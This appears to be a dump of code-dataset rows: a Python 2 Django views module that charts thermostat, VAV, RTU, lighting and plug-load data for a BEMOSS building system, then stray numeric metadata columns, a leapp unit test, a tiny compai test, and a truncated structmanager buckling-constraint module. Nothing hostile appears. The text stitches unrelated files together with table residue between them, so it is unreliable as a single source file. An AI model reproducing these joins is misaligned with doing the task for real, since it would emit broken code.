'mac': mac, 'nickname': device_nickname, 'zone_nickname': zone_nickname}, context)
@login_required(login_url='/login/')
def auto_update_charts_thermostat(request):
if request.method == 'POST':
print 'inside cassandra auto update thermostat'
_data = request.body
_data = json.loads(_data)
mac = _data['mac']
if 'from_dt' in _data.keys():
from_date = _data['from_dt']
print from_date
else:
from_date = ''
device_id = get_device_id_from_mac(mac)
if from_date == '':
data_points, rs = retrieve(device_id, ['time', 'temperature',
'heat_setpoint', 'cool_setpoint'])
else:
from_date = datetime.datetime.strptime(from_date, '%Y/%m/%d %H:%M')
data_points, rs = retrieve(device_id, ['time', 'temperature',
'heat_setpoint', 'cool_setpoint'], from_date)
rs_temperature = parse_resultset(data_points, 'temperature', rs)
rs_heat_setpoint = parse_resultset(data_points, 'heat_setpoint', rs)
rs_cool_setpoint = parse_resultset(data_points, 'cool_setpoint', rs)
json_result = {
'temperature': rs_temperature,
'heat_setpoint': rs_heat_setpoint,
'cool_setpoint': rs_cool_setpoint
}
print 'test'
if request.is_ajax():
return HttpResponse(json.dumps(json_result), mimetype='application/json')
@login_required(login_url='/login/')
def get_statistics_datetime_thermostat(request):
if request.method == 'POST':
print 'inside cassandra get statistics for thermostat based on given from and to datetime'
_data = request.body
_data = json.loads(_data)
mac = _data['mac']
from_date = _data['from_dt']
to_date = _data['to_dt']
print from_date
device_id = get_device_id_from_mac(mac)
if not from_date and not to_date:
data_points, rs = retrieve(device_id, ['time', 'temperature',
'heat_setpoint', 'cool_setpoint'])
elif not to_date and from_date:
from_date = datetime.datetime.strptime(from_date, '%Y/%m/%d %H:%M')
data_points, rs = retrieve(device_id, ['time', 'temperature',
'heat_setpoint', 'cool_setpoint'], from_date)
else:
from_date = datetime.datetime.strptime(from_date, '%Y/%m/%d %H:%M')
to_date = datetime.datetime.strptime(to_date, '%Y/%m/%d %H:%M')
data_points, rs = retrieve(device_id, ['time', 'temperature',
'heat_setpoint', 'cool_setpoint'], from_date, to_date)
rs_temperature = parse_resultset(data_points, 'temperature', rs)
rs_heat_setpoint = parse_resultset(data_points, 'heat_setpoint', rs)
rs_cool_setpoint = parse_resultset(data_points, 'cool_setpoint', rs)
json_result = {
'temperature': rs_temperature,
'heat_setpoint': rs_heat_setpoint,
'cool_setpoint': rs_cool_setpoint
}
print 'Got results based on datetime'
if request.is_ajax():
return HttpResponse(json.dumps(json_result), mimetype='application/json')
@login_required(login_url='/login/')
def charts_vav(request, mac):
"""Page load definition for VAV statistics."""
print "inside smap view method"
context = RequestContext(request)
if request.method == 'GET':
device_id = get_device_id_from_mac(mac)
device_status = [ob.as_json() for ob in VAV.objects.filter(vav_id=device_id)]
device_nickname = device_status[0]['nickname']
zone_nickname = device_status[0]['zone']['zone_nickname']
data_points, rs = retrieve(device_id, ['time', 'temperature', 'supply_temperature',
'heat_setpoint', 'cool_setpoint', 'flap_position'])
rs_temperature = parse_resultset(data_points, 'temperature', rs)
rs_supply_temperature = parse_resultset(data_points, 'supply_temperature', rs)
rs_heat_setpoint = parse_resultset(data_points, 'heat_setpoint', rs)
rs_cool_setpoint = parse_resultset(data_points, 'cool_setpoint', rs)
rs_flap_position = parse_resultset(data_points, 'flap_position', rs)
context = update_context(context)
return render_to_response(
'charts/charts_vav.html',
{'temperature': rs_temperature, 'supply_temperature': rs_supply_temperature,
'flap_position': rs_flap_position, 'heat_setpoint': rs_heat_setpoint, 'cool_setpoint': rs_cool_setpoint,
'nickname': device_nickname, 'mac': mac,
'zone_nickname': zone_nickname},
context)
@login_required(login_url='/login/')
def auto_update_charts_vav(request):
"""Statistics page load for VAV"""
if request.method == 'POST':
print 'inside smap auto update VAV'
_data = request.body
_data = json.loads(_data)
mac = _data['mac']
print mac
if 'from_dt' in _data.keys():
from_date = _data['from_dt']
print from_date
else:
from_date = ''
device_id = get_device_id_from_mac(mac)
if from_date == '':
data_points, rs = retrieve(device_id, ['time', 'temperature', 'supply_temperature',
'heat_setpoint', 'cool_setpoint', 'flap_position'])
else:
from_date = datetime.datetime.strptime(from_date, '%Y/%m/%d %H:%M')
data_points, rs = retrieve(device_id, ['time', 'temperature', 'supply_temperature',
'heat_setpoint', 'cool_setpoint', 'flap_position'], from_date)
rs_temperature = parse_resultset(data_points, 'temperature', rs)
rs_supply_temperature = parse_resultset(data_points, 'supply_temperature', rs)
rs_heat_setpoint = parse_resultset(data_points, 'heat_setpoint', rs)
rs_cool_setpoint = parse_resultset(data_points, 'cool_setpoint', rs)
rs_flap_position = parse_resultset(data_points, 'flap_position', rs)
json_result = {'temperature': rs_temperature,
'supply_temperature': rs_supply_temperature,
'flap_position': rs_flap_position,
'heat_setpoint': rs_heat_setpoint,
'cool_setpoint': rs_cool_setpoint}
if request.is_ajax():
return HttpResponse(json.dumps(json_result), mimetype='application/json')
@login_required(login_url='/login/')
def get_statistics_datetime_vav(request):
if request.method == 'POST':
print 'inside cassandra get statistics for vav based on given from and to datetime'
_data = request.body
_data = json.loads(_data)
mac = _data['mac']
from_date = _data['from_dt']
to_date = _data['to_dt']
print from_date
device_id = get_device_id_from_mac(mac)
if not from_date and not to_date:
data_points, rs = retrieve(device_id, ['time', 'temperature', 'supply_temperature',
'heat_setpoint', 'cool_setpoint', 'flap_position'])
elif not to_date and from_date:
from_date = datetime.datetime.strptime(from_date, '%Y/%m/%d %H:%M')
data_points, rs = retrieve(device_id, ['time', 'temperature', 'supply_temperature',
'heat_setpoint', 'cool_setpoint', 'flap_position'], from_date)
else:
from_date = datetime.datetime.strptime(from_date, '%Y/%m/%d %H:%M')
to_date = datetime.datetime.strptime(to_date, '%Y/%m/%d %H:%M')
data_points, rs = retrieve(device_id, ['time', 'temperature', 'supply_temperature',
'heat_setpoint', 'cool_setpoint', 'flap_position'], from_date, to_date)
rs_temperature = parse_resultset(data_points, 'temperature', rs)
rs_supply_temperature = parse_resultset(data_points, 'supply_temperature', rs)
rs_heat_setpoint = parse_resultset(data_points, 'heat_setpoint', rs)
rs_cool_setpoint = parse_resultset(data_points, 'cool_setpoint', rs)
rs_flap_position = parse_resultset(data_points, 'flap_position', rs)
json_result = {'temperature': rs_temperature,
'supply_temperature': rs_supply_temperature,
'flap_position': rs_flap_position,
'heat_setpoint': rs_heat_setpoint,
'cool_setpoint': rs_cool_setpoint}
print 'Got results based on datetime'
if request.is_ajax():
return HttpResponse(json.dumps(json_result), mimetype='application/json')
@login_required(login_url='/login/')
def charts_rtu(request, mac):
"""Page load definition for RTU statistics."""
print "inside smap view method"
context = RequestContext(request)
if request.method == 'GET':
device_id = get_device_id_from_mac(mac)
device_status = [ob.as_json() for ob in RTU.objects.filter(rtu_id=device_id)]
device_nickname = device_status[0]['nickname']
zone_nickname = device_status[0]['zone']['zone_nickname']
data_points, rs = retrieve(device_id, ['time', 'outside_temperature', 'return_temperature', 'supply_temperature',
'heat_setpoint', 'cool_setpoint', 'cooling_mode', 'heating',
'outside_damper_position', 'bypass_damper_position'])
rs_outside_temperature = parse_resultset(data_points, 'outside_temperature', rs)
rs_return_temperature = parse_resultset(data_points, 'return_temperature', rs)
rs_supply_temperature = parse_resultset(data_points, 'supply_temperature', rs)
rs_heat_setpoint = parse_resultset(data_points, 'heat_setpoint', rs)
rs_cool_setpoint = parse_resultset(data_points, 'cool_setpoint', rs)
rs_cooling_mode = []
rs_heating = parse_resultset(data_points, 'heating', rs)
rs_outside_damper_position = parse_resultset(data_points, 'outside_damper_position', rs)
rs_bypass_damper_position = parse_resultset(data_points, 'bypass_damper_position', rs)
context = update_context(context)
return render_to_response(
'charts/charts_rtu.html',
{'outside_temperature': rs_outside_temperature, 'supply_temperature': rs_supply_temperature,
'return_temperature': rs_return_temperature, 'heating': rs_heating,
'outside_damper_position': rs_outside_damper_position,
'bypass_damper_position': rs_bypass_damper_position, 'cooling_mode': rs_cooling_mode,
'heat_setpoint': rs_heat_setpoint, 'cool_setpoint': rs_cool_setpoint,
'nickname': device_nickname, 'mac': mac,
'zone_nickname': zone_nickname},
context)
@login_required(login_url='/login/')
def auto_update_charts_rtu(request):
"""Statistics page update for RTU"""
if request.method == 'POST':
print 'inside cassandra auto update RTU'
_data = request.body
_data = json.loads(_data)
mac = _data['mac']
if 'from_dt' in _data.keys():
from_date = _data['from_dt']
print from_date
else:
from_date = ''
device_id = get_device_id_from_mac(mac)
if from_date == '':
data_points, rs = retrieve(device_id, ['time', 'outside_temperature', 'return_temperature', 'supply_temperature',
'heat_setpoint', 'cool_setpoint', 'cooling_mode', 'heating',
'outside_damper_position', 'bypass_damper_position'])
else:
from_date = datetime.datetime.strptime(from_date, '%Y/%m/%d %H:%M')
data_points, rs = retrieve(device_id, ['time', 'outside_temperature', 'return_temperature', 'supply_temperature',
'heat_setpoint', 'cool_setpoint', 'cooling_mode', 'heating',
'outside_damper_position', 'bypass_damper_position'], from_date)
rs_outside_temperature = parse_resultset(data_points, 'outside_temperature', rs)
rs_return_temperature = parse_resultset(data_points, 'return_temperature', rs)
rs_supply_temperature = parse_resultset(data_points, 'supply_temperature', rs)
rs_heat_setpoint = parse_resultset(data_points, 'heat_setpoint', rs)
rs_cool_setpoint = parse_resultset(data_points, 'cool_setpoint', rs)
rs_cooling_mode = parse_resultset(data_points, 'cooling_mode', rs)
rs_heating = parse_resultset(data_points, 'heating', rs)
rs_outside_damper_position = parse_resultset(data_points, 'outside_damper_position', rs)
rs_bypass_damper_position = parse_resultset(data_points, 'bypass_damper_position', rs)
json_result = {'outside_temperature': rs_outside_temperature,
'supply_temperature': rs_supply_temperature,
'return_temperature': rs_return_temperature,
'heating': rs_heating,
'outside_damper_position': rs_outside_damper_position,
'bypass_damper_position': rs_bypass_damper_position,
'cooling_mode': rs_cooling_mode,
'heat_setpoint': rs_heat_setpoint,
'cool_setpoint': rs_cool_setpoint}
print 'test'
if request.is_ajax():
return HttpResponse(json.dumps(json_result), mimetype='application/json')
@login_required(login_url='/login/')
def get_statistics_datetime_rtu(request):
if request.method == 'POST':
print 'inside cassandra get statistics for rtu based on given from and to datetime'
_data = request.body
_data = json.loads(_data)
mac = _data['mac']
from_date = _data['from_dt']
to_date = _data['to_dt']
print from_date
device_id = get_device_id_from_mac(mac)
if not from_date and not to_date:
data_points, rs = retrieve(device_id, ['time', 'outside_temperature', 'return_temperature', 'supply_temperature',
'heat_setpoint', 'cool_setpoint', 'cooling_mode', 'heating',
'outside_damper_position', 'bypass_damper_position'])
elif not to_date and from_date:
from_date = datetime.datetime.strptime(from_date, '%Y/%m/%d %H:%M')
data_points, rs = retrieve(device_id, ['time', 'outside_temperature', 'return_temperature', 'supply_temperature',
'heat_setpoint', 'cool_setpoint', 'cooling_mode', 'heating',
'outside_damper_position', 'bypass_damper_position'], from_date)
else:
from_date = datetime.datetime.strptime(from_date, '%Y/%m/%d %H:%M')
to_date = datetime.datetime.strptime(to_date, '%Y/%m/%d %H:%M')
data_points, rs = retrieve(device_id, ['time', 'outside_temperature', 'return_temperature', 'supply_temperature',
'heat_setpoint', 'cool_setpoint', 'cooling_mode', 'heating',
'outside_damper_position', 'bypass_damper_position'], from_date, to_date)
rs_outside_temperature = parse_resultset(data_points, 'outside_temperature', rs)
rs_return_temperature = parse_resultset(data_points, 'return_temperature', rs)
rs_supply_temperature = parse_resultset(data_points, 'supply_temperature', rs)
rs_heat_setpoint = parse_resultset(data_points, 'heat_setpoint', rs)
rs_cool_setpoint = parse_resultset(data_points, 'cool_setpoint', rs)
rs_cooling_mode = parse_resultset(data_points, 'cooling_mode', rs)
rs_heating = parse_resultset(data_points, 'heating', rs)
rs_outside_damper_position = parse_resultset(data_points, 'outside_damper_position', rs)
rs_bypass_damper_position = parse_resultset(data_points, 'bypass_damper_position', rs)
json_result = {'outside_temperature': rs_outside_temperature,
'supply_temperature': rs_supply_temperature,
'return_temperature': rs_return_temperature,
'heating': rs_heating,
'outside_damper_position': rs_outside_damper_position,
'bypass_damper_position': rs_bypass_damper_position,
'cooling_mode': rs_cooling_mode,
'heat_setpoint': rs_heat_setpoint,
'cool_setpoint': rs_cool_setpoint
}
print 'Got results based on datetime'
if request.is_ajax():
return HttpResponse(json.dumps(json_result), mimetype='application/json')
@login_required(login_url='/login/')
def auto_update_charts_lighting(request):
if request.method == 'POST':
print 'inside cassandra auto update lighting'
_data = request.body
_data = json.loads(_data)
mac = _data['mac']
if 'from_dt' in _data.keys():
from_date = _data['from_dt']
print from_date
else:
from_date = ''
device_id = get_device_id_from_mac(mac)
if from_date == '':
data_points, rs = retrieve(device_id, ['time', 'status', 'brightness'])
else:
from_date = datetime.datetime.strptime(from_date, '%Y/%m/%d %H:%M')
data_points, rs = retrieve(device_id, ['time', 'status', 'brightness'], from_date)
rs_status = parse_resultset(data_points, 'status', rs)
rs_brightness = parse_resultset(data_points, 'brightness', rs)
json_result = {
'status': rs_status,
'brightness': rs_brightness
}
if request.is_ajax():
return HttpResponse(json.dumps(json_result), mimetype='application/json')
@login_required(login_url='/login/')
def get_statistics_datetime_lighting(request):
if request.method == 'POST':
print 'inside cassandra get statistics for lighting based on given from and to datetime'
_data = request.body
_data = json.loads(_data)
mac = _data['mac']
from_date = _data['from_dt']
to_date = _data['to_dt']
print from_date
device_id = get_device_id_from_mac(mac)
if not from_date and not to_date:
data_points, rs = retrieve(device_id, ['time', 'status', 'brightness'])
elif not to_date and from_date:
from_date = datetime.datetime.strptime(from_date, '%Y/%m/%d %H:%M')
data_points, rs = retrieve(device_id, ['time', 'status', 'brightness'], from_date)
else:
from_date = datetime.datetime.strptime(from_date, '%Y/%m/%d %H:%M')
to_date = datetime.datetime.strptime(to_date, '%Y/%m/%d %H:%M')
data_points, rs = retrieve(device_id, ['time', 'status', 'brightness'], from_date, to_date)
rs_status = parse_resultset(data_points, 'status', rs)
rs_brightness = parse_resultset(data_points, 'brightness', rs)
json_result = {
'status': rs_status,
'brightness': rs_brightness
}
print 'Got results based on datetime'
if request.is_ajax():
return HttpResponse(json.dumps(json_result), mimetype='application/json')
@login_required(login_url='/login/')
def charts_lighting(request, mac):
print "inside cassandra view method for lighting"
context = RequestContext(request)
if request.method == 'GET':
device_id = get_device_id_from_mac(mac)
device_status = [ob.data_as_json() for ob in Lighting.objects.filter(lighting_id=device_id)]
device_nickname = device_status[0]['nickname']
zone_nickname = device_status[0]['zone']['zone_nickname']
data_points, rs = retrieve(device_id, ['time', 'status', 'brightness'])
rs_status = parse_resultset(data_points, 'status', rs)
rs_brightness = parse_resultset(data_points, 'brightness', rs)
context = update_context(context)
return render_to_response(
'charts/charts_lighting.html',
{'status': rs_status, 'brightness': rs_brightness,
'nickname': device_nickname, 'zone_nickname': zone_nickname,
'mac': mac}, context)
@login_required(login_url='/login/')
def charts_plugload(request, mac):
print "inside cassandra view method for plugload"
context = RequestContext(request)
if request.method == 'GET':
device_metadata = [ob.device_control_page_info() for ob in DeviceMetadata.objects.filter(mac_address=mac)]
device_id = device_metadata[0]['device_id']
device_type_id = device_metadata[0]['device_model_id']
device_type_id = device_type_id.device_model_id
if device_type_id == '2WL':
device_status = [ob.data_as_json() for ob in Lighting.objects.filter(lighting_id=device_id)]
device_nickname = device_status[0]['nickname']
zone_nickname = device_status[0]['zone']['zone_nickname']
else:
device_status = [ob.data_as_json() for ob in Plugload.objects.filter(plugload_id=device_id)]
device_nickname = device_status[0]['nickname']
zone_nickname = device_status[0]['zone']['zone_nickname']
data_points, rs = retrieve(device_id, ['time', 'status'])
rs_status = parse_resultset(data_points, 'status', rs)
update_context(context)
return render_to_response(
'charts/charts_plugload.html',
{'status': rs_status, 'mac': mac, 'nickname': device_nickname, 'zone_nickname': zone_nickname,
'device_type_id': device_type_id}, context)
@login_required(login_url='/login/')
def auto_update_charts_plugload(request):
if request.method == 'POST':
print 'inside cassandra auto update plugload'
_data = request.body
_data = json.loads(_data)
mac = _data['mac']
if 'from_dt' in _data.keys():
from_date = _data['from_dt']
print from_date
else:
from_date = ''
device_id = get_device_id_from_mac(mac)
if from_date == '':
data_points, rs = retrieve(device_id, ['time', 'status'])
else:
from_date = datetime.datetime.strptime(from_date, '%Y/%m/%d %H:%M')
data_points, rs = retrieve(device_id, ['time', 'status'], from_date)
rs_status = parse_resultset(data_points, 'status', rs)
json_result = {
'status': rs_status
}
print 'test'
if request.is_ajax():
return HttpResponse(json.dumps(json_result), mimetype='application/json')
@login_required(login_url='/login/')
def get_statistics_datetime_plugload(request):
if request.method == 'POST':
print 'inside cassandra get statistics for plugload based on given from and to datetime'
_data = request.body
_data = json.loads(_data)
mac = _data['mac']
from_date = _data['from_dt']
to_date = _data['to_dt']
print from_date
device_id = get_device_id_from_mac(mac)
if not from_date and not to_date:
data_points, rs = retrieve(device_id, ['time', 'status'])
elif not to_date and from_date:
from_date = datetime.datetime.strptime(from_date, '%Y/%m/%d %H:%M')
data_points, rs = retrieve(device_id, ['time', 'status'], from_date)
else:
from_date = datetime.datetime.strptime(from_date, '%Y/%m/%d %H:%M')
to_date = datetime.datetime.strptime(to_date, '%Y/%m/%d %H:%M')
data_points, rs = retrieve(device_id, ['time', 'status'], from_date, to_date)
rs_status = parse_resultset(data_points, 'status', rs)
json_result = {
'status': rs_status
}
print 'Got results based on datetime'
if request.is_ajax():
return HttpResponse(json.dumps(json_result), mimetype='application/json')
@login_required(login_url='/login/')
def charts_wattstopper_plugload(request, mac):
context = RequestContext(request)
if request.method == 'GET':
device_id = get_device_id_from_mac(mac)
device_status = [ob.data_as_json() for ob in Plugload.objects.filter(plugload_id=device_id)]
device_nickname = device_status[0]['nickname']
zone_nickname = device_status[0]['zone']['zone_nickname']
data_points, rs = retrieve(device_id, ['time', 'status', 'power'])
rs_status = parse_resultset(data_points, 'status', rs)
rs_power = parse_resultset(data_points, 'power', rs)
context = update_context(context)
return render_to_response(
'charts/charts_wtplug.html',
{'status': rs_status, 'power': rs_power, 'nickname': device_nickname, 'zone_nickname': zone_nickname,
'mac': mac}, context)
@login_required(login_url='/login/')
def auto_update_charts_wattstopper_plugload(request):
if request.method == 'POST':
print 'inside cassandra auto update wattstopper plugload'
_data = request.body
_data = json.loads(_data)
mac = _data['mac']
if 'from_dt' in _data.keys():
from_date = _data['from_dt']
print from_date
else:
from_date = ''
device_id = get_device_id_from_mac(mac)
if from_date == '':
data_points, rs = retrieve(device_id, ['time', 'status', 'power'])
else:
from_date = datetime.datetime.strptime(from_date, '%Y/%m/%d %H:%M')
data_points, rs = retrieve(device_id, ['time', 'status', 'power'], from_date)
rs_status = parse_resultset(data_points, 'status', rs)
rs_power = parse_resultset(data_points, 'power', rs)
json_result = {
'status': rs_status,
'power': rs_power
}
if request.is_ajax():
return HttpResponse(json.dumps(json_result), mimetype='application/json')
@login_required(login_url='/login/')
def get_statistics_datetime_wattstopper_plugload(request):
if request.method == 'POST':
print 'inside cassandra get statistics for wattstopper plugload based on given from and to datetime'
_data = request.body
_data = json.loads(_data)
mac = _data['mac']
from_date = _data['from_dt']
to_date = _data['to_dt']
print from_date
device_id = get_device_id_from_mac(mac)
if not from_date and not to_date:
data_points, rs = retrieve(device_id, ['time', 'status', 'power'])
elif not to_date and from_date:
from_date = datetime.datetime.strptime(from_date, '%Y/%m/%d %H:%M')
data_points, rs = retrieve(device_id, ['time', 'status', 'power'], from_date)
else:
from_date = datetime.datetime.strptime(from_date, '%Y/%m/%d %H:%M')
to_date = datetime.datetime.strptime(to_date, '%Y/%m/%d %H:%M')
print from_date, to_date
data_points, rs = retrieve(device_id, ['time', 'status', 'power'], from_date, to_date)
rs_status = parse_resultset(data_points, 'status', rs)
rs_power = parse_resultset(data_points, 'power', rs)
json_result = {
'status': rs_status,
'power': rs_power
}
print 'Got results based on datetime'
if request.is_ajax():
return HttpResponse(json.dumps(json_result), mimetype='application/json')
def get_device_id_from_mac(mac):
device_metadata = [ob.device_control_page_info() for ob in DeviceMetadata.objects.filter(mac_address=mac)]
print device_metadata
device_id = device_metadata[0]['device_id']
return device_id
def update_context(context):
device_list_side_nav = get_device_list_side_navigation()
context.update(device_list_side_nav)
active_al = get_notifications()
context.update({'active_al': active_al})
bemoss_not = general_notifications()
context.update({'b_al': bemoss_not})
return context
def _decode_list(data):
rv = []
for item in data:
if isinstance(item, unicode):
item = item.encode('utf-8')
elif isinstance(item, list):
item = _decode_list(item)
elif isinstance(item, dict):
item = _decode_dict(item)
rv.append(item)
return rv
def _decode_dict(data):
rv = {}
for key, value in data.iteritems():
if isinstance(key, unicode):
key = key.encode('utf-8')
if isinstance(value, unicode):
value = value.encode('utf-8')
elif isinstance(value, list):
value = _decode_list(value)
elif isinstance(value, dict):
value = _decode_dict(value)
rv[key] = value
return rv
| 44.567394
| 125
| 0.650642
| 4,179
| 34,718
| 5.096435
| 0.096674
| 0.038689
| 0.054935
| 0.073246
| 0.804442
| 0.790732
| 0.779698
| 0.773875
| 0.761762
| 0.748568
| 0
| 0.003202
| 0.244427
| 34,718
| 779
| 126
| 44.567394
| 0.808669
| 0.003773
| 0
| 0.758037
| 0
| 0
| 0.193219
| 0.022687
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.020305
| 0.032149
| null | null | 0.071066
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f42afc198ec8a98bf9cf7652961910cc3c8c7b11
| 2,009
|
py
|
Python
|
repos/system_upgrade/el7toel8/actors/checkskippedrepositories/tests/test_checkskippedrepos.py
|
adka1408/leapp-repository
|
be5a9603b57f86c65d395ba6a02b860cacae0fb6
|
[
"Apache-2.0"
] | null | null | null |
repos/system_upgrade/el7toel8/actors/checkskippedrepositories/tests/test_checkskippedrepos.py
|
adka1408/leapp-repository
|
be5a9603b57f86c65d395ba6a02b860cacae0fb6
|
[
"Apache-2.0"
] | null | null | null |
repos/system_upgrade/el7toel8/actors/checkskippedrepositories/tests/test_checkskippedrepos.py
|
adka1408/leapp-repository
|
be5a9603b57f86c65d395ba6a02b860cacae0fb6
|
[
"Apache-2.0"
] | null | null | null |
from leapp.models import Report, SkippedRepositories
def test_skipped_repos(current_actor_context):
reported_packages = ['pkg_a', 'pkg_b', 'pkg_c']
reported_repos = ['repo_a', 'repo_b', 'repo_c']
current_actor_context.feed(
SkippedRepositories(
packages=list(reported_packages),
repos=list(reported_repos)
)
)
current_actor_context.run()
reports = list(current_actor_context.consume(Report))
assert reports
assert len(reports) == 1
report = reports[0]
for pkg in reported_packages:
assert '\n- {}'.format(pkg) in report.detail.get('summary')
for repo in reported_repos:
assert '\n- {}'.format(repo) in report.detail.get('summary')
def test_skipped_just_repos(current_actor_context):
reported_repos = ['repo_a', 'repo_b', 'repo_c']
current_actor_context.feed(
SkippedRepositories(
packages=[],
repos=list(reported_repos)
)
)
current_actor_context.run()
reports = list(current_actor_context.consume(Report))
assert reports
assert len(reports) == 1
report = reports[0]
for repo in reported_repos:
assert '\n- {}'.format(repo) in report.detail.get('summary')
def test_skipped_repos_empty(current_actor_context):
current_actor_context.feed(
SkippedRepositories(
packages=[],
repos=[]
)
)
current_actor_context.run()
reports = list(current_actor_context.consume(Report))
assert not reports
def test_skipped_repos_no_repos(current_actor_context):
current_actor_context.feed(
SkippedRepositories(
packages=['woot'],
repos=[]
)
)
current_actor_context.run()
reports = list(current_actor_context.consume(Report))
assert not reports
def test_skipped_repos_no_message(current_actor_context):
current_actor_context.run()
reports = list(current_actor_context.consume(Report))
assert not reports
| 28.295775
| 68
| 0.669985
| 233
| 2,009
| 5.467811
| 0.180258
| 0.178964
| 0.28336
| 0.131868
| 0.875196
| 0.812402
| 0.797488
| 0.797488
| 0.797488
| 0.689168
| 0
| 0.002576
| 0.226979
| 2,009
| 70
| 69
| 28.7
| 0.817772
| 0
| 0
| 0.672414
| 0
| 0
| 0.046789
| 0
| 0
| 0
| 0
| 0
| 0.172414
| 1
| 0.086207
| false
| 0
| 0.017241
| 0
| 0.103448
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f42f170bcc3200cc56a28bdd2b7a26c34729ba3a
| 108
|
py
|
Python
|
tests/test_compai.py
|
frndmg/compai
|
6a77e79c71bd490f44496ae60689b4bad37ddaf9
|
[
"MIT"
] | 7
|
2020-12-29T13:55:15.000Z
|
2021-12-02T22:20:33.000Z
|
tests/test_compai.py
|
frndmg/compai
|
6a77e79c71bd490f44496ae60689b4bad37ddaf9
|
[
"MIT"
] | 3
|
2021-01-20T15:18:36.000Z
|
2021-03-10T17:21:24.000Z
|
tests/test_compai.py
|
frndmg/compai
|
6a77e79c71bd490f44496ae60689b4bad37ddaf9
|
[
"MIT"
] | 1
|
2021-01-20T15:17:28.000Z
|
2021-01-20T15:17:28.000Z
|
from compai import dict_map
def test_dict_map():
assert dict_map(a=int)(dict(a='123')) == dict(a=123)
| 18
| 56
| 0.685185
| 20
| 108
| 3.5
| 0.55
| 0.3
| 0.228571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.065217
| 0.148148
| 108
| 5
| 57
| 21.6
| 0.695652
| 0
| 0
| 0
| 0
| 0
| 0.027778
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
f437f27af614339153ee93f076a954adf73a5ce2
| 10,673
|
py
|
Python
|
structmanager/optimization/sol200/elements1d/stringer/constraints.py
|
saullocastro/structmanager
|
01e9677f201c9ef577fdf8a15833be7e364441ab
|
[
"BSD-3-Clause"
] | 1
|
2015-09-17T20:48:08.000Z
|
2015-09-17T20:48:08.000Z
|
structmanager/optimization/sol200/elements1d/stringer/constraints.py
|
saullocastro/structmanager
|
01e9677f201c9ef577fdf8a15833be7e364441ab
|
[
"BSD-3-Clause"
] | 1
|
2019-01-09T20:31:17.000Z
|
2019-01-10T11:10:07.000Z
|
structmanager/optimization/sol200/elements1d/stringer/constraints.py
|
saullocastro/structmanager
|
01e9677f201c9ef577fdf8a15833be7e364441ab
|
[
"BSD-3-Clause"
] | 1
|
2020-12-29T00:22:23.000Z
|
2020-12-29T00:22:23.000Z
|
import structmanager.sol200.output_codes as output_codes_SOL200
from structmanager.sol200 import (DRESP1, DCONSTR, DEQATN, DRESP2, DESVAR,
DVPREL1, DVPREL2)
def constrain_buckling(self, method=1, ms=0.1):
"""Add a buckling constraint
Parameters
----------
method : int, optional
Select one of the following methods for buckling calculation:
For `profile` in ['Z_t', 'Z_t_b' or 'Z_t_b_h']:
- `1` : Bruhn's method for Channel- and Z-section stiffeners. From
Fig. C6.4 for `tw=tf` (thickness web = thickness flange)
- considers only compressive loads
- no plasticity correction has been implemented
For `profile` in ['B_t', 'B_t_h']:
- `1` : Bruhn's method for combined shear and compression, from
Chapter C5.11.
- disconsiders bending effects
- assumes 3 edges simply supported with one free unloaded
edge.
- no plasticity correction has been implemented
ms : float, optional
Minimum margin of safety to be used as constraint.
"""
self.create_dvars()
eltype = self.elements[0].type
# reading constants
dtable_E = self.dtables['STRE'][0]
dtable_nu = self.dtables['STRnu'][0]
if method == 1 and self.profile.lower() == 'z_t':
# buckling equation
deqatn = DEQATN(
'bf(t, b, h, E, nu, FA) = b-t/2.;'
'bw = h-t;'
'x = bf/bw;'
'Kw = -206.08*x**5 + 588.3*x**4 - 596.43*x**3 '
'+ 249.62*x**2 -41.924*x + 6.4545;'
'SIGMAcr = Kw*PI(1)**2*E*t**2/(12.*(1.-nu**2)*bw**2);'
'MS = SIGMAcr/ABS(MIN(FA, 0.0001))-1.;')
self.add_deqatn(deqatn)
# reading variables
dvar_t = self.dvars['STRZt']
# reading constants
dtable_b = self.dtables['STRZb'][0]
dtable_h = self.dtables['STRZh'][0]
# building DRESP1 that reads:
# - axial stress
OUTC = output_codes_SOL200.OUTC
if eltype == 'CBAR':
atta = OUTC['STRESS']['CBAR']['Axial']
else:
raise NotImplementedError('element %s not implemented' %
eltype)
eid = self.get_central_element().eid
dresp_FA = DRESP1('STRZFA', 'STRESS', 'ELEM', region=None,
atta=atta, attb='', atti=eid)
self.add_dresp(dresp_FA)
# building DRESP2
dresp2 = DRESP2('STRBUCK', deqatn.id)
dresp2.dvars = [dvar_t.id]
dresp2.dtable = [dtable_b, dtable_h, dtable_E, dtable_nu]
dresp2.dresp1 = [dresp_FA.id]
self.add_dresp(dresp2)
# applying constraint
dcid = self.constraints['buckling']
dconstr = self.add_constraint(dcid, dresp2, ms, None)
elif method == 1 and self.profile.lower() == 'z_t_b':
# buckling equation
deqatn = DEQATN(
'bf(t, b, h, E, nu, FA) = b-t/2.;'
'bw = h-t;'
'x = bf/bw;'
'Kw = -206.08*x**5 + 588.3*x**4 - 596.43*x**3 '
'+ 249.62*x**2 -41.924*x + 6.4545;'
'SIGMAcr = Kw*PI(1)**2*E*t**2/(12.*(1.-nu**2)*bw**2);'
'MS = SIGMAcr/ABS(MIN(FA, 0.0001))-1.;')
self.add_deqatn(deqatn)
# reading variables
dvar_t = self.dvars['STRZt']
dvar_b = self.dvars['STRZb']
# reading constants
dtable_h = self.dtables['STRZh'][0]
